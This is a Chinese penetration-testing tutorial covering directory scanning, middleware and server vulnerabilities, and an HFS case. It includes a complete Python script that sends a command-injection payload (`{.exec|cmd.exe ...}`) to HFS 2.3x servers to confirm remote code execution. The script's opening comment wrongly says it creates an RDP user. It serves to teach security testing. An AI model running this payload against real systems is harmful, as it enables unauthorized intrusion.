基于web目录扫描&域名结构的渗透案例

工具:御剑 google hacking
漏洞类型:dedecms
4.png
很多网站的子目录下也是一个网站,所以一般需要一些目录扫描工具来辅助使用
比如windows下的御剑后台扫描工具 或者是通用的dirbuster
我们平常应用的时候也需要一些子域名扫描工具
比如dirsearch
https://github.com/maurosoria/dirsearch
良好的信息收集是渗透测试的开始
随便百度dedecms漏洞就能一大堆

5.png

其实一般漏洞的存活期都很短,因为开发者也在一直不断修复,主要的是要有一种思维,能够灵活应变和绕过。

基于中间件平台的渗透测试思路

工具:netsparker
漏洞:tomcat/IIS解析漏洞等

6.png
可以看到IIS6.0 已经是很早的解析漏洞了 asp;.jpg这种,但这种中间件平台例如tomcat这种
前两天也是爆了个比较严重的漏洞,所以及时收集漏洞信息,常备扫描器和字典也是好的方法

基于服务器漏洞的渗透测试案例

工具:nessus
漏洞:服务器类型ms系列
2.png
nessus集成环境是一个不错的漏洞扫描利用工具,我们直接进行扫描
2.png
MS-09001是一个远程代码执行问题
在网上很容易找到这种类型的漏洞
所以关键点还是工具的利用

基于第三方软件漏洞的渗透案例

利用工具:nmap
漏洞类型:hfs
1.png
用nmap扫描存在端口
依次访问端口尝试
2.png
发现使用了hfs 在网上找到相关漏洞
3.png
这个能使用的前提是目标主机是管理员权限登录
当HFS版本处于2.3c机器之前的HFS2.3x版本均可以
当HFS以管理员身份运行时候可以get-shell
在网上发现了payload脚本

 #-*- coding:utf-8 -*-
 2 
 3 """
 4 
 5 
 6 
 7 原理是创建一个新用户,设置密码和权限,然后你就可以RDP了
 8 """
 9 
10 #引入依赖的包、库文件
11 import time
12 import uuid
13 import requests
14 from optparse import OptionParser
15 
16 
17 #定义扫描类
18 class HFSScanner:
19     """
20         HFS扫描类,原理是:
21             (1)生成随机字符串,利用命令执行写入远端服务器的HFS.exe目录下的一个文件。
22             (2)然后再次利用这里漏洞将文件内容读取出来放在响应报文的头部字段set-cookie中。
23             (3)通过判断响应报文该字段是否包含随机字符串来确定是否存在漏洞
24 
25     """
26     def __init__(self,target,port):
27         """创建扫描类实例对象"""
28         self.__randomflag = uuid.uuid1() #攻击验证随机标志字符串
29         self.__attack_url = r"http://%s:%s/"%(str(target),str(port))+"?search==%00"+r"{.exec|cmd.exe /c del result}"+r"{"+".exec|cmd.exe /c echo>result "+str(self.__randomflag)+"."+"}"
30         self.__verify_url = r"http://%s:%s/"%(str(target),str(port))+"?search==%00"+"{.cookie|out|value={.load|result.}.}"
31 
32 
33     def __attack(self):
34         """发送攻击报文,响应200后反回True"""
35         try:
36             response = requests.get(self.__attack_url,timeout=120)
37         except Exception,reason:
38             return False
39         if response.status_code != 200:
40             return False
41         return True
42 
43     def __verify(self):
44         """发送验证报文,判断set-cookie字段是否为随机标志字符串"""
45         try:
46             response = requests.get(self.__verify_url,timeout=120)
47         except Exception,reason:
48             return False
49         if response.headers.get("set-cookie").find(str(self.__randomflag)) >= 0:
50             return True
51         else:
52             return False
53 
54     def scan(self):
55         """扫描函数"""
56         print "[+] 开始测试..."
57         if self.__attack():
58             time.sleep(5)
59             if self.__verify():
60                 return True
61         return False
62 
63 if __name__ == "__main__":
64     parser = OptionParser("")
65     parser.add_option("-t", dest="target",help="target to scan")
66     parser.add_option("-p", dest="port",help="port to scan")
67     (options, args) = parser.parse_args()
68     if options.target in ["",None]:
69         print "[-] 请输入正确的参数!"
70         print """
71             正确的使用方法:
72             #python hfs_vuln_scan.py -t 127.0.0.1 [-p 8080]
73         """
74         exit(0)
75     if options.port in ["",None] or int(options.port) <= 0 and int(options.port) > 65535:
76         options.port = "80"
77     scanner = HFSScanner(options.target,options.port)
78     if scanner.scan():
79         print "[*] 目标主机存在漏洞"
80     else:
81         print "[+] 目标主机不存在漏洞"

然后平常扫描的端口可能存在以下漏洞

22——>ssh弱口令
873——>rsync 未授权访问漏洞
3306——>mysql弱口令
6379——>redis未授权访问漏洞